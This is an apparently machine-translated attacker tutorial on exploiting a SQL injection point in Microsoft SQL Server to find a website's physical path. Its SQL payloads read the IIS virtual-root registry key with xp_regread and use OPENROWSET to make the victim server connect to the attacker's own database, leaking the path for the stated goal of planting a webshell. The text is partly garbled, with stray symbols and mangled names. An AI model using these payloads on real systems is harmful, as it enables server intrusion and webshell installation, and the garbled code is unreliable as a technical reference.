Infiltration using OPENROWSET to engage in Shell methods _ security-related

Infiltration using OPENROWSET to engage the shell
Get the SQL injection point, the first thought is backup Webshell, throw in NB run a lap, found that blocked the SQL error messages, not the physical path, that also wrote a PP horse.
Associated with a command that is not very high OPENROWSET, a cross-Library server query, is to send an SQL command to the remote database, and then look at the results returned, but to start event tracking! We can write the website information to the database and then%$^%$@#$@^%$~
First build the SQL database on your own machine

Then create a table on the other machine (dbo). [Fenggou] ([Cha8][char] (255))--

Execute DECLARE @result varchar (255) EXEC master.dbo.xp_regread ' HKEY_LOCAL_MACHINE ' in each other, ' system\controlset001\services\ W3svc\parameters\virtual Roots ', '/', @result output insert into Fenggou (CHA8) VALUES (' Select A.* from OPENROWSET (' Sqlol EDB ', ' own IP '; Sa '; ' Your password ', ' select * from pubs.dbo.authors where au_fname= ' ' + @result + ' ' as a ');--

So Fenggou This table will have such a record select a.* from OPENROWSET (' SQLOLEDB ', ' own IP '; Sa '; ' Your password ', ' select * from pubs.dbo.authors where au_fname= ' d:\web,,1 ') as a

Needless to say, ' D:\WEB ' is the physical path read from the registration form. Then execute declare @a1 char (255) Set @a1 = (select Cha8 from Fenggou) exec (@a1);

Equal to the execution of the select a.* from OPENROWSET (' SQLOLEDB ', ' own IP '; Sa '; ' Your password ', ' select * from pubs.dbo.authors where au_fname= ' d:\web,,1 ') as a

OK, then you're on your machine. The select * from pubs.dbo.authors where au_fname= ' d:\web,,1 ' is displayed on the SQL Event Tracker
Wow hahaha physical path got to write pony Pass